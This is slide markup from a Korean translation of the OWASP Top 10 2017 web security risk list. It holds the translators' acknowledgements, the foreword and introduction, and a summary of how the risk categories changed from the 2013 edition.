        <p:xfrm>
          <a:off x="0" y="971600"/>
          <a:ext cx="6858000" cy="816596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한글 번역 기여자에 대한 감사 인사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한글 번역을 위해 수고해 주신 모든 분들께 감사드립니다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dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                      </a:br>
                      <a:endParaRPr lang="en-US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361950" algn="l"/>
                          <a:tab pos="1885950" algn="l"/>
                          <a:tab pos="1971675" algn="l"/>
                          <a:tab pos="3409950" algn="l"/>
                          <a:tab pos="3495675" algn="l"/>
                          <a:tab pos="4933950" algn="l"/>
                          <a:tab pos="5019675" algn="l"/>
                        </a:tabLst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정보보안 전문 커뮤니티 </a:t>
                      </a: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시큐리티플러스에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대하여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4898"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="4600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시큐리티플러스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(SecurityPlus)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2004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월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‘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 그 이상의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세계로’라는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캐치프레이즈를 갖고 네이버 보안 커뮤니티로 시작했습니다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2017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11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월 현재 네이버 카페 회원 수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만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7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천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9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백여명의 회원 수를 보유 하고 있으며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/>
                        </a:rPr>
                        <a:t>페이스북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카카오톡 등 다양한 소셜 플랫폼을 통해 활발한 활동을 펼쳐 나가고 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시큐리티플러스는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국내외 다양한 오픈 커뮤니티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 관련 기관과 협회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그리고 많은 보안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회사들과의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소통과 커뮤니케이션을 통해 국내 보안 향상에 많은 공헌을 하기 위해 노력하고 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본 커뮤니티에서의 주요 활동은 아래와 같습니다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국내외 보안 동향과 국내 환경 상 높은 위험이 예상되는 보안 취약점 전파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국내외 보안 기술 자료 수집 및 공유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해외 중요 보안 문서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(OWASP Top 10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등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한글 번역 및 공유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참고할만한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보안 표준 연구 개발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최신 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IT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기술 발전에 따른 보안 관련 연구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각종 보안 표준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지침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가이드라인 연구 및 보급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개인을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포함한 각 기관과 회사에 대한 보안 자문 활동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개인을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포함한 국내 보안 연구가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연구기관에 대한 연구활동 지원 및 커뮤니케이션 연계</a:t>
                      </a:r>
                      <a:b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</a:b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초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중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고등학교 정보보호 전문가 진로 탐구 학습 및 정보보호 학과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/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동아리 소속 대학생 멘토링 지원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시큐리티플러스는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국내외 보안에 관심 있는 모든 이에게 열려 있는 오픈 커뮤니티이며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시큐리티플러스의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모든 활동은 자발적인 커뮤니티 회원의 자원 봉사에 힘입어 이뤄졌습니다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시큐리티플러스는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앞으로도 국내 보안 수준 향상에 지속적인 기여를 하기 위해 다양한 방법으로 정보와 기술 공유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자문과 가이드를 제공할 것이며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국내외 보안 커뮤니티의 중심이 되도록 노력할 것입니다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관심 있는 많은 분들의 참여를 기다립니다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!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172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C5A71-CDF7-40E6-9F8A-7B7F0554B2F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8722" y="1608575"/>
            <a:ext cx="6849278" cy="2590685"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" numCol="1" spcCol="457200" rtlCol="0" anchor="t">
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="82550" indent="-82550" fontAlgn="b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번역 프로젝트 관리 및 감수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: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박형근 대표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,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실장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Hyungkeun Park/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시큐리티플러스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,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한국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IBM/ CISSP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550" fontAlgn="b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감수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(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ㄱㄴㄷ순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  <a:b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</a:b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-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강용석 부장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YongSeok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Kang/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한국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IBM/ CISA, PMP,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정보관리기술사</a:t>
            </a:r>
            <a:b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</a:b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-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박창렴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이사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Park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Changryum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오픈이지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CISA, SW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보안약점진단원</a:t>
            </a:r>
            <a:b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</a:b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-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조민재 팀장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Johnny Cho/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우아한형제들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편집 및 감수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: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신상원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Shin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Sangwon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시큐리티플러스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해킹보안전문가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번역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(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ㄱㄴㄷ순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김영하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Youngha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Kim/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에이콘출판사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박상영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Sangyoung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Park/ SK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테크엑스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,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사이버보안전문단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이민욱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MinWook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Lee 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수원대학교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정초아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JUNG CHOAH/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코빗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(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korbit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)/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정보처리기사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조광렬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CHO KWANG YULL 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시큐리티플러스</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR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fontAlgn="b">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr 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  - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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최한동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en-US" altLang="ko-KR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Handong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Choi/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가천대학교</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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정보보안산업기사</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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7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17476"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="987552"/>
          <a:ext cx="6858000" cy="815644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Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>서문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7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안전하지 않은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소프트웨어는 금융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의료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국방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에너지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 중요한 기반 시설을 약화시키고 있습니다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소프트웨어가 점점 더 중요해지고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복잡해지고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연결되어 있을수록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보안을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달성하기는 더더욱 기하급수적으로 어려워질 것입니다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현대 소프트웨어 개발 프로세스가 빠르게 진화하면서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위험을 신속하고 정확하게 발견하는 것이 중요합니다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우리는 더 이상 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 TOP 10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제시된 것과 같은 상대적으로 간단한 보안 문제를 더이상 용납할 수 없습니다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95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10 - 2017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제작 기간 동안 다른 동등한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노력보다 더 많은 의견이 접수되었습니다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이것은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대해 얼마나 열정을 갖고 있는지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그리고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 대부분의 사용 사례에 대해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차지하는 것이 얼마나 중요한지를 보여줍니다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프로젝트의 원래 목표는 단순히 개발자와 관리자의 인식을 높이는 것이었지만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사실상 애플리케이션 보안의 업계 표준이 되었습니다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이번 판에서는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보안 프로그램에서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채택할 수 있도록 지원하는 문제 및 권장 사항이 간결하게 작성되어 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확실한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표준이 필요한 경우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크고 성과가 뛰어난 조직에서는 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OWASP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애플리케이션 보안 검증 표준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(ASVS)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사용하는 것이 좋습니다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하지만 대부분의 경우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애플리케이션 보안 여행을 시작하기에 가장 좋은 방법입니다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우리는 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="9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개발자를 위한 다음 단계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보안 테스터를 위한 다음 단계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CIO</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr 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및 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR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CISO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에게 적합한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 action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>조직을 위한 다음 단계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그리고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관리자 또는 애플리케이션의 수명주기 책임자에게 적합한 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="9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8" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>애플리케이션 관리자를 위한 다음 단계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등 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en-US" altLang="ko-KR" sz="9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Top 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="9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사용하는 다양한 사용자들을 위한 다음 단계를 제안했습니다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="9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장기적으로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우리는 모든 소프트웨어 개발팀과 조직이 귀하의 문화 및 기술과 호환되는 보안 프로그램을 개발할 것을 권장합니다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이러한 프로그램은 모든 형태와 크기로 이루어져 있습니다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조직의 기존 강점을 활용하고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9"/>
                        </a:rPr>
                        <a:t>소프트웨어 보증 성숙도 모델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사용하여 귀사의 애플리케이션 보안 프로그램을 측정하고 개선하십시오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Top 10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귀하의 애플리케이션 보안에 도움이 되길 희망합니다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질문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의견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아이디어가 있다면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GitHub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 저장소를 통해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주저하지 말고 연락 주시기 바랍니다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0"/>
                        </a:rPr>
                        <a:t>https://github.com/OWASP/Top10/issues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 및 번역은 다음에서 찾을 수 있습니다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1"/>
                        </a:rPr>
                        <a:t>https://www.owasp.org/index.php/top10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마지막으로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OWASP Top 10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프로젝트의 설립자인 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Dave </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="950" dirty="0" err="1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Wichers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Jeff Williams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창립 리더십에 감사드리며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일을 커뮤니티의 도움으로 끝내기를 믿습니다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고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맙습니다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!</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="950" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF00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endParaRPr lang="en-US" sz="950" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FF00FF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Andrew van der Stock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Brian Glas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Neil Smithlin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e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Torsten Gigler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후원자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Exo 2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284831"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1400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10 - 2017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후원해주는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2"/>
                        </a:rPr>
                        <a:t>Autodesk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감사의 말씀 드립니다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취약점 확산 데이터 또는 기타 도움을 제공한 조직 및 개인은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 action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>감사 인사 페이지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나열됩니다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40266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 sz="4000" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>FW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서문</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Exo 2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86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6EF41C-22F0-4CD0-98DC-529189A4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2611"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="990599"/>
          <a:ext cx="6858000" cy="829151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04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환영합니다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR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!</a:t>
                      </a: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 </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0"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0470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주요 업데이트는 커뮤니티에서 선택한 두 가지 이슈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en-US" sz="95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A8:2017-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="95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안전하지 않은 역직렬화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</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="95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A10:2017-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="95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 action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>불충분한 로깅 및 모니터링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포함하여 몇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가지 새로운 이슈를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추가했습니다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이전의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판과 두 가지 주요 차이점은 실질적인 커뮤니티 피드백과 수십 개의 조직에서 수집한 광범위한 데이터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보안 표준 준비 과정에서 가장 많은 양의 데이터가 수집되었을 가능성이 있는 데이터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입니다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이는 새로운 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현재 조직이 직면하고 있는 가장 영향력 있는 애플리케이션 보안 위험을 해결한다는 확신을 줍니다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="0" i="0" u="none" strike="noStrike" noProof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10 -</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr 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2017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주로 애플리케이션 보안을 전문으로 하는 회사에서 제출한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40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이상의 데이터와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500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명 이상의 사람들이 완료한 업계 설문 조사를 기반으로 합니다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데이터는 수 백 개의 조직과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10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만 개가 넘는 실제 애플리케이션 및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API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수집된 취약점을 포괄합니다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항목은 공격 가능성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탐지 가능성 및 영향도를 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" noProof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햡의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추정한 값으로 보정한 널리 퍼진 데이터에 따라 선별되고 순위가 정해졌습니다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="1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OWASP Top 10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목표는 개발자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디자이너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설계자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및 조직에게 가장 중요한 웹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보안 취약점에 대한 영향을 교육하기 위해서입니다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상위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10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가지는 이러한 고위험의 문제로부터 보호하고 향후 지침을 제공하기 위한 기본 기술을 제공합니다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95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20683"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="3810000"/>
          <a:ext cx="3352800" cy="532914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600" b="1" kern="1200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미래</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="1" kern="1200" baseline="0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1600" b="1" kern="1200" baseline="0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활동에 대한 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1600" b="1" kern="1200" baseline="0" dirty="0" err="1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로드맵</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" kern="1200" dirty="0"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 멈추지 마세요</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="950" b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Top 10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외에도 웹 애플리케이션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 전체 보안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에 영향을 끼치는 수백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 가지의 문제가 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="950" kern="1200" baseline="0" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>OWASP </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="950" kern="1200" baseline="0" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>개발자 가이드</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="950" kern="1200" baseline="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50" kern="1200" baseline="0" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:hlinkClick r:id="rId7"/>
                        </a:rPr>
                        <a:t>OWASP </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="950" kern="1200" baseline="0" dirty="0" err="1">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:hlinkClick r:id="rId7"/>
                        </a:rPr>
                        <a:t>치트</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="950" kern="1200" baseline="0" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:hlinkClick r:id="rId7"/>
                        </a:rPr>
                        <a:t> 시트 시리즈</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="950" kern="1200" baseline="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950" kern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있습니다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웹 애플리케이션과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를 개발하는 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="9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누구든지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 이 문서들을 반드시 읽어야 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효과적으로 웹 애플리케이션과 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의 취약점을 찾는 방법은 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hlinkClick r:id="rId8"/>
                        </a:rPr>
                        <a:t>OWASP </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="950" baseline="0" dirty="0" err="1">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:hlinkClick r:id="rId8"/>
                        </a:rPr>
                        <a:t>테스팅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hlinkClick r:id="rId8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hlinkClick r:id="rId8"/>
                        </a:rPr>
                        <a:t>가이드</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="950" u="none" baseline="0" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>에서 제공합니다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sz="950" baseline="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끊임없이 변합니다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR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Top 10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은 계속 변할 것입니다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개발자가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코드를 한 줄도 바꾸지 않더라도 새로운 결함이 발견되고 공격 방법이 개선되기 때문에 취약해질 수 있습니다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</a:rPr>
                        <a:t>더 많은 정보는 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="950" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>Top 10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</a:rPr>
                        <a:t>끝에 있는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9" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>개발자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0" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>보안 테스터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1" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>조직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그리고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2" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>애플리케이션 관리자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위한 다음 단계를 참고하시기 바랍니다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1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긍정적으로 생각하세요</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="950" b="1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취약점 추적을 멈추고 강한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애플리케이션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보안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통제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집중할 준비가 되면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95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/>
                        </a:rPr>
                        <a:t>OWASP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/>
                        </a:rPr>
                        <a:t>적극적인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3"/>
                        </a:rPr>
                        <a:t>통제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프로젝트는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개발자가 애플리케이션에 보안을 구축할 수 있는 출발점을 제공하며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4"/>
                        </a:rPr>
                        <a:t>OWASP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4"/>
                        </a:rPr>
                        <a:t>애플리케이션 보안 검증 표준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4"/>
                        </a:rPr>
                        <a:t>(ASVS)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조직과 애플리케이션 검토자에게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무엇을 점검해야 할지에 대한 가이드입니다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도구를 폭넓게 사용하세요</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR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보안 취약점들은 꽤 복잡하고 코드 깊숙이 묻혀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있습니다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많은 경우에는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이러한 취약점을 찾고 제거하기 위한 가장 효율적인 방법은 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US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향상된</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR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도구를 가진 전문가입니다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="9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도구를 단독으로 사용하는 것은 잘못된 보안 감각을 제공하므로 권장하지 않습니다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR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꼼꼼하게 확인하세요</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="950" b="1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보안을 귀사의 개발 조직 전체에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귀사 문화의 통합적인 부분으로 초점을 맞추시기 바랍니다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/>
                        </a:rPr>
                        <a:t>OWASP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/>
                        </a:rPr>
                        <a:t>소프트웨어 보증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/>
                        </a:rPr>
                        <a:t> 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/>
                        </a:rPr>
                        <a:t>성숙도 모델</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr 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  <a:hlinkClick r:id="rId15"/>
                        </a:rPr>
                        <a:t>(SAMM)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="95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에서</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US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더 많은 정보를 확인하시기 바랍니다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="950" baseline="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aseline="0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1531"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3429000" y="3810001"/>
          <a:ext cx="3429000" cy="5328377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감사의 글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2017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업데이트를 지원하기 위해 취약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점이 있는 데이터를 제공한 조직에게 감사합니다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우리는 데이터 요청에 대해 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 이상의 응답을 받았습니다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처음으로 모든 데이터가 이번 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Top 10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기여했으며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기여자의 전체 목록이 공개되었습니다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우리는 이것이 공개적으로 수집된 취약점이 있는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더 크고 다양한 데이터 모음 중 하나라고 생각합니다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sz="950" b="0" i="0" u="none" strike="noStrike" noProof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ko-KR" altLang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike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여기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공간보다 더 많은 공헌자가 있기 때문에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16" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>공헌에 대한 감사 페이지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만들었습니다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공개적으로 취약점이 있는 데이터를 공유하는데 기꺼이 선두에 서서 노력해 준 이 조직들에게 진심으로 감사드립니다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우리는 이것이 계속해서 성장하고 더 많은 조직이 동일하게 수행하며 증거에 기반한 보안의 핵심 이정표 중 하나로 여겨지기를 바랍니다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OWASP Top 10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이러한 놀라운 공헌 없이는 가능하지 않습니다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sz="9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업계 순위 조사를 완료하는데 걸린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 이상의 개인에게 큰 감사를 드립니다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귀사의 목소리가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Top 10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새로 추가된 두 가지를 결정하는데 큰 도움이 되었습니다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의견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격려의 메모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비판 등 모두 만족했습니다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우리는 귀사의 시간이 소중하다는 것을 알고 감사하다고 말하고 싶습니다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sz="950" dirty="0">
                        <a:latin typeface="+mn-ea"/>
                        <a:ea typeface="+mn-e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우리는 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Top</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR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10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위해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건설적인 논평과 시간을 검토하는데 기여한 사람들에게 감사를 표하고자 합니다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR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가능한 한 많이</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="95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16" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>감사 인사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페이지에 나열했습니다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="95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ko-KR" altLang="en-US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끝으로</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR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OWASP Top 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US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을 전 세계에서 읽기 쉽게 번역 도움을 주신 모든 번역자분들께도 감사의 말씀을 전합니다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="950" u="none" kern="120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950" b="0" i="0" u="none" strike="noStrike" noProof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>
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>I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Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>소개글</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Exo 2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6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">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53BBC665-1B35-4A1D-B9C5-F23A1464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93826"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="990600"/>
          <a:ext cx="6858000" cy="815150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2013</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US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년 버전 대비 무엇이 바뀌었습니까</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="1" i="0" u="none" strike="noStrike" noProof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en-US" sz="1600" b="1" i="0" u="none" strike="noStrike" noProof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229">
                <a:tc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지난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4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년 동안 변화가 가속되었으며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OWASP Top 10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 변화해야 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우리는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OWASP Top 10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완벽히 재설계하고 방법론을 개선했습니다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또한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새로운 데이터 호출 프로세스를 활용하고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커뮤니티와 협력하여 리스크를 재조정하였습니다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그리고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위험을 다시 작성하고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공통적으로 사용되는 프레임워크 및 언어에 대한 참조를 추가했습니다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lnSpc>
                          <a:spcPts val="1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지난 몇 년간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애플리케이션의 근본적인 기술과 아키텍처는 상당히 변화했습니다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node.js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Spring Boot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로 작성된 마이크로 서비스는 전통적인 단일 애플리케이션을 대체하고 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마이크로 서비스는 마이크로 서비스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컨테이너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비밀 관리 등 서로 간의 신뢰를 구축하는 것을 포함하여 자체 보안 문제를 안고 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인터넷에서 접근할 수 있을 것으로 예상되지 않은 이전 코드는 이제 단일 페이지 애플리케이션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(SPA)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및 모바일 애플리케이션에서 사용되는 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API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또는 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RESTful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웹 서비스 뒤에 있습니다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신뢰할 수 있는 호출자와 같은 코드에 의한 아키텍처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가정은 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더 이상 유효하지 않습니다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR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Angular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및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같은 자바스크립트 프레임워크로 작성된 단일 프레임 페이지 애플리케이션은 모듈식 기능이 많은 프론트 엔드를 만들 수 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전형적으로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서버 측에서 제공되는 클라이언트 측의 기능은 자체 보안 문제를 야기합니다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자바스크립트는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이제 서버 측에서 실행되는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node.js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클라이언트에서 실행되는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Bootstrap, Electron, Angular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및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같은 최신 웹 프레임워크를 사용하는 웹의 기본 언어입니다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데이터가 제공한 새로운 문제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A4:2017-XML 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외부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 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개체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 action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>(XXE)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주로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/>
                        </a:rPr>
                        <a:t>소스 코드 분석 보안 테스팅 도구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(SAST)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데이터 집합에서 지원되는 새로운 범주입니다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커뮤니티가 제공한 새로운 문제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우리는 커뮤니티가 지켜보고 있는 두 가지 취약점에 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike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대한 통찰력을 제공할 것을 요청했습니다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="900" b="0" i="0" u="none" strike="noStrike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500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개 이상의 개별 제출 및 민감한 노출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XXE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 같은 이미 제시된 데이터를 제거한 후 다음과 같은 두 가지 새로운 문제가 있었습니다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A8:2017-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안전하지 않은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 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역직렬화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 영향을 받는 플랫폼에서 원격 코드 실행 또는 중요한 개체 조작을 허용합니다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 action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>불충분한 로깅과 모니터링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악의적인 활동 및 침입 탐지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사고 대응 및 디지털 포렌식을 방해하거나 크게 지연시킬 수 있는 결함이 있습니다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병합했거나 삭제됐지만</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR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잊지 말아야 하는 사항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A4-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안전하지 않은 직접 객체 참조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와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A7-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기능 수준의 접근 통제 누락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</a:t>
                      </a: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8" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>A5:2017-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8" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>취약한 접근 통제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항목으로</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="900" b="0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병합되었습니다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A8-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" alt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크로스</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr 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ko-KR" alt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사이트</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr 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요청</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr 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변조</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0"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(CSRF)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" kern="1200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은 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR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9"/>
                        </a:rPr>
                        <a:t>CSRF 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hlinkClick r:id="rId9"/>
                        </a:rPr>
                        <a:t>방어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포함한 많은 프레임워크에 있기 때문에 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR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5%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애플리케이션에서만 발견되었습니다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR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lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" kern="1200" noProof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A10-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="900" b="1" i="0" u="none" strike="noStrike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검증되지</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="900" b="1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않은 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="900" b="1" i="0" u="none" strike="noStrike" baseline="0" noProof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리다이렉트</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="900" b="1" i="0" u="none" strike="noStrike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및 포워드</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="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 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약</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr 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8%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의 애플리케이션에서 발견되었지만</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr 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XXE</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" alt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밀려났습니다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" kern="1200" noProof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800" lvl="0" indent="-82800" algn="l"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900" dirty="0"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34910"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="5455920"/>
          <a:ext cx="6858000" cy="368808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24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OWASP Top 10 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr 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-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2013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OWASP Top 10 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr 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 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 – </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" alt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인젝션</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="95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인젝션</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="95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인증과 세션 관리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인증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크로스 사이트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(XSS)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민감한 데이터 노출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안전하지 않은 직접 객체 참조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kern="120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 </a:t>
                      </a:r>
                      <a:r>
